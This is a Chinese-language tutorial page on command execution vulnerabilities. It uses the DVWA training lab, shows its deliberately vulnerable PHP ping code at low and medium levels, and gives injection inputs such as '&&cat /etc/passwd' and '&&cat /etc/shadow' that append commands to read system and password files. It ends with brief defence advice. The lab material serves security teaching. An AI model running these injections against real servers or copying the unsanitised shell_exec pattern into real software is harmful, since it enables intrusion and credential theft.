思享工具箱

命令执行漏洞

摘要:
˃示例应用程序命令执行漏洞防御1.命令执行可能发生在各种框架、插件和其他位置。升级到新版本并应用更多修补程序。2.关注行业的最新安全趋势。一旦出现命令执行漏洞,请快速修复以避免产生更大的影响。3.减少使用框架/CMS

1、命令执行(Command Execution)漏洞即黑客可以直接在Web应用中执行系统命令,从而获取敏感信息或者拿下shell权限

2、命令执行漏洞可能造成的原因是Web服务器对用户输入命令安全检测不足,导致恶意代码被执行

3、更常见的命令执行漏洞是发生在各种Web组件,包括Web容器、Web框架、CMS软件、安全组件等

DVWA

low

分析代码

 1  <?php
 2 
 3 if( isset( $_POST[ 'Submit' ]  ) ) {    
 4     // Get input
 5     $target = $_REQUEST[ 'ip' ];       //low级别中没有进行任何过滤 直接把get的值输出   
 6 
 7     // Determine OS and execute the ping command.
 8     if( stristr( php_uname( 's' ), 'Windows NT' ) ) {
 9         // Windows
10         $cmd = shell_exec( 'ping  ' . $target );
11     }
12     else {
13         // *nix
14         $cmd = shell_exec( 'ping  -c 4 ' . $target );
15     }
16 
17     // Feedback for the end user
18     echo "<pre>{$cmd}</pre>";
19 }
20 
21 ?>

命令执行漏洞第1张

上面搭建环境是win  若是在linux下搭建环境 可执行一下命令

  • 114.114.114.114&&uname
  • 114.114.114.114&&pwd
  • 114.114.114.114&&ls -l
  • 114.114.114.114&&cat /etc/passwd    //查看用户
  • 114.114.114.114&&cat /etc/shadow  //查看密码

medium

 1 <?php
 2 
 3 if( isset( $_POST[ 'Submit' ]  ) ) {
 4     // Get input
 5     $target = $_REQUEST[ 'ip' ];
 6 
 7     // Set blacklist
 8     $substitutions = array(
 9         '&&' => '',          //对输入的 && 和 ; 进行过滤
10         ';'  => '',
11     );
12 
13     // Remove any of the charactars in the array (blacklist).
14     $target = str_replace( array_keys( $substitutions ), $substitutions, $target );
15 
16     // Determine OS and execute the ping command.
17     if( stristr( php_uname( 's' ), 'Windows NT' ) ) {
18         // Windows
19         $cmd = shell_exec( 'ping  ' . $target );
20     }
21     else {
22         // *nix
23         $cmd = shell_exec( 'ping  -c 4 ' . $target );
24     }
25 
26     // Feedback for the end user
27     echo "<pre>{$cmd}</pre>";
28 }
29 
30 ?>

命令执行漏洞第2张

 实例应用

命令执行漏洞第3张

 命令执行漏洞防御

1、各种框架、插件等位置都有可能出现命令执行,升级到新版本,多打补丁

2、关注行业最新安全动态,一旦爆发命令执行漏洞,迅速修复,避免造成更大影响

3、少用框架/CMS

标签:#target#漏洞#ping | 浏览:149 | 发布日期:

免责声明:文章转载自《命令执行漏洞》仅用于学习参考。如对内容有疑问,请及时联系本站处理。

上篇46-wxpython 4 使用 grid 展示表格MSSQLSERVER 服务运行内存设置较小导致启动服务失败下篇

宿迁高防,2C2G15M,22元/月;香港BGP,2C5G5M,25元/月 雨云优惠码:MjYwNzM=

相关文章

ThinkPHP v5.x命令执行利用工具(可getshell)

漏洞验证 命令执行 getshell 工具下载 https://download.csdn.net/download/fly_hps/10848910 免责声明 该工具只能授权验证网站漏洞和站长验证漏洞使用。禁止用于未授权测试,非法入侵,否则一切后果自负,和作者无关...

zabbix监控MySQL主从状态

首先需要拥有zabbix环境及MySQL主从环境   搭建zabbix环境可参考:https://www.cnblogs.com/l999999999/p/12051165.html 需要用到三台虚拟机 一:192.168.238.141 zabbix-server 二:192.168.238.142 zabbix-agent mysql主 三:192.1...

Linux下搭建iSCSI共享存储的方法 TGT 方式 CentOS6.9系统下

iSCSI(internet SCSI)技术由IBM公司研究开发,是一个供硬件设备使用的、可以在IP协议的上层运行的SCSI指令集,这种指令集合可以实现在IP网络上运行SCSI协议,使其能够在诸如高速千兆以太网上进行路由选择。iSCSI技术是一种新储存技术,该技术是将现有SCSI接口与以太网络(Ethernet)技术结合,使服务器可与使用IP网络的储存装置...

【 Linux 】Systemd 配置文件说明及编写(2)

1. 开机启动 对于支持 systemd 的软件,如果想要设置开机启动,就执行如下命令(以 http 为例): systemctl enable httpd 上面的命令相当于在 /etc/systemd/system/ 目录里添加了一个符号链接,指向 /usr/lib/systemd/system/ 里面的 httpd.service 文件。 这是因为...

ThinkPHP漏洞分析与利用

一、组件介绍 1.1 基本信息 ThinkPHP是一个快速、兼容而且简单的轻量级国产PHP开发框架,遵循Apache 2开源协议发布,使用面向对象的开发结构和MVC模式,融合了Struts的思想和TagLib(标签库)、RoR的ORM映射和ActiveRecord模式。 ThinkPHP可以支持windows/Unix/Linux等服务器环境,正式版需要P...

python中多线程,多进程,多协程概念及编程上的应用

1, 多线程  线程是进程的一个实体,是CPU进行调度的最小单位,他是比进程更小能独立运行的基本单位。  线程基本不拥有系统资源,只占用一点运行中的资源(如程序计数器,一组寄存器和栈),但是它可以与同属于一个进程的其他线程共享全部的资源。  提高程序的运行速率,上下文切换快,开销比较少,但是不够稳定,容易丢失数据,形成死锁。 直接上代码: impor...

最新文章

随机推荐

思享工具箱导航